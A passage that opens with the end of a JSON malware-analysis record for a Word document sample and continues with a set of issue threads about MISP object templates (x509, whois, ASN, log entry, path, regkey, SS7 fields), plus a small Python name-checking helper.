      "owners": [
        "cert",
        "*"
      ],
      "sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
      "names": [
        "DEC2248QO.doc"
      ],
      "probable_names": [],
      "parent_analyses": [],
      "antivirus": {},
      "sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
      "detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
      "mime": "application/msword",
      "analysis": [
        {
          "$oid": "58d4f256014ed28a5d50c113"
        }
      ],
      "groups": [
        "cert",
        "*"
      ],
      "_id": {
        "$oid": "58d4f256014ed28a5d50c112"
      },
      "type": "word",
      "md5": "757e9b7209f0d6ef3cf7bfd904445009"
    },
    "iocs": [],
    "executed_modules": [
      "office_macros"
    ],
    "probable_names": [],
    "extracted_files": [],
    "status": "finished",
    "tags": [
      "office_macros"
    ],
    "groups": [
      "cert",
      "*"
    ],
    "pending_modules": [],
    "analyst": {
      "$oid": "58d4e81b014ed25aaa77fabf"
    },
    "waiting_modules": [],
    "canceled_modules": [],
    "threat_intelligence": {},
    "generated_files": {},
    "_id": {
      "$oid": "58d4f256014ed28a5d50c113"
    },
    "options": {}
  }
}

x509 attribute types are different than normal attribute types

An existing attribute type is x509-fingerprint-sha1, however the x509 misp object defines the misp-attribute as md5, sha1, sha256.

This has 2 downsides:

  1. searching for attribute types like x509-fingerprint-sha1 (PyMISP and web interface) will not return x509 misp-object attributes
  2. a dump of (any) md5, sha1, sha256 which are everywhere else used for filenames, will also contain hashes related to x509 certificates; which is illogical

The proposal is thus to change the x509 object type to the

  1. already existing x509-fingerprint-sha1
  2. newly created x509-fingerprint-md5, and x509-fingerprint-sha256

What do you think?

RAT config object?

RAT config object? Following the talk from @bambenek, we might need a generic misp-object for the RAT or malware configuration.

The idea is to store the JSON in that object but we might need some metadata. @bambenek do you see the required metadata which would be needed?

Extend whois object + misp attributes

  1. add new misp attribute whois-registrant-org (used by domaintools for example)
  2. add new object relation to whois field registrant-org
  3. rename registant to registrant in whois object

Path object

Path object following a discussion with @sebdraven we would need an object which includes the following:

  • A complete path
  • The split path (for correlation)
  • Objective of the path (malware inner operation, stealing and ...)

incorrect object names "domain|ip" and "ip|port"

Hi all,

IMHO the object names "domain|ip" and "ip|port" should read "domain-ip" and "ip-port". Otherwise, an exception "UnknownMISPObjectTemplate" could be thrown if:

  • an existing Event which contains at least one of these objects is loaded by PyMISP:
  • load() method in mispevent.py calls "set_all_values" (line 397), which calls "from_dict"
  • line 480: tmp_object = MISPObject(obj['name']) whereas obj['name'] results in either "domain|ip" or "ip|port", which are not valid object names, leading to the exception
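A pre-load check for the situation described in the issue above, as an added example that is not part of the original post or of PyMISP: it scans an event's objects for names that have no template and suggests the hyphenated form when that one exists. The template set, the sample event and both function names are constructed for illustration.

```python
import json

# Constructed subset of template names (misp-objects uses one directory per
# template); a real check would list the directories of the checked-out repo.
KNOWN_TEMPLATES = {"domain-ip", "ip-port", "whois", "x509", "file"}

# Constructed sample event containing the two names from the issue, one valid
# name and one name that cannot be repaired.
SAMPLE_EVENT = json.loads("""
{"Event": {"info": "constructed sample",
  "Object": [
    {"name": "domain|ip", "Attribute": []},
    {"name": "ip-port", "Attribute": []},
    {"name": "ip|port", "Attribute": []},
    {"name": "no-such-template", "Attribute": []}
  ]}}
""")


def check_object_names(event, known=KNOWN_TEMPLATES):
    """Return (index, name, suggestion) for each object without a template.

    suggestion is the name with '|' replaced by '-' when that form is a known
    template, otherwise None.
    """
    findings = []
    objects = event.get("Event", event).get("Object", [])
    for idx, obj in enumerate(objects):
        name = obj.get("name")
        if isinstance(name, str) and name in known:
            continue
        candidate = name.replace("|", "-") if isinstance(name, str) else None
        findings.append((idx, name, candidate if candidate in known else None))
    return findings


def normalise_object_names(event, known=KNOWN_TEMPLATES):
    """Rewrite repairable names in place; return the names left unresolved."""
    objects = event.get("Event", event).get("Object", [])
    unresolved = []
    for idx, name, suggestion in check_object_names(event, known):
        if suggestion is not None:
            objects[idx]["name"] = suggestion
        else:
            unresolved.append(name)
    return unresolved


if __name__ == "__main__":
    for idx, name, suggestion in check_object_names(SAMPLE_EVENT):
        print(f"object #{idx}: unknown template {name!r}, suggestion: {suggestion}")
    print("still unresolved:", normalise_object_names(SAMPLE_EVENT))
```

Running such a check before handing the event to a loader turns an exception in the middle of parsing into a list of objects to fix or skip.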

x509 add relationship

This relation should be used to link x509 certificates between us to create the certification chain. It should be used to link a PE object or url object too.

    {
      "name": "signed-by",
      "description": "This relationship describes an object signed by another object.",
      "format": [
        "misp"
      ]
    },

ASN object to add

ASN object including ASN number, description, country code, list of subnet announced (multiple), first_seen, last_seen, import(multiple), export (multiple), mp-import (multiple), mp-export (multiple).

Object: Log Entry

It would be nice to have a dedicated object for "log-Entry" that then can be used to build a timeline

  • Timestamp (UTC)
  • Timestamp description (e.g. in what log have you found it)
  • System (e.g. which system is your log entry covering)
  • Event description / raw log line
  • Notes
  • involved user
  • Added by
  • malicious yes / no

That way you could create a nice timeline during an investigation

Regkey object

in the same way like Path object, #89

we have different states for the reg keys:

  • use for persistence

  • read to steal information

  • set the malware configuration like proxy settings

wireshark format object


Split email objects

Split email message and email addresses to keep the relation between addresses and display names

Diameter object generic

Diameter object generic

Session-Id
Origin-Host
Origin-Realm
Destination-Realm
Destination-Host
User-Name (usually IMSI SS7)

MapSmsTP-DCS value set to 0 is considered as empty value

In the object Ss7-attack when I try to add a TP-DCS with value 0, MISP is returning the following error:

Could not save object as at least one attribute has failed validation (MapSmsTP-DCS). {"value":["Value cannot be empty."]}

Category selected is "Other" by default for the field.

When I validate the object without the field then try to edit it again to add MapSmsTP-DCS with value 0, no error is displayed but the field addition is silently dropped.

MISP-Modules - Object question

Quick question, as I can't find any answer either in the documentation or on GitHub. Can someone point me to an example of code where "object" is used in a misp module (expansion)?

Whois object - typo

"registar": {
  "description": "Registar of the whois entry",
  "ui-priority": 0,
  "misp-attribute": "whois-registar"
}

Should be whois-registrar
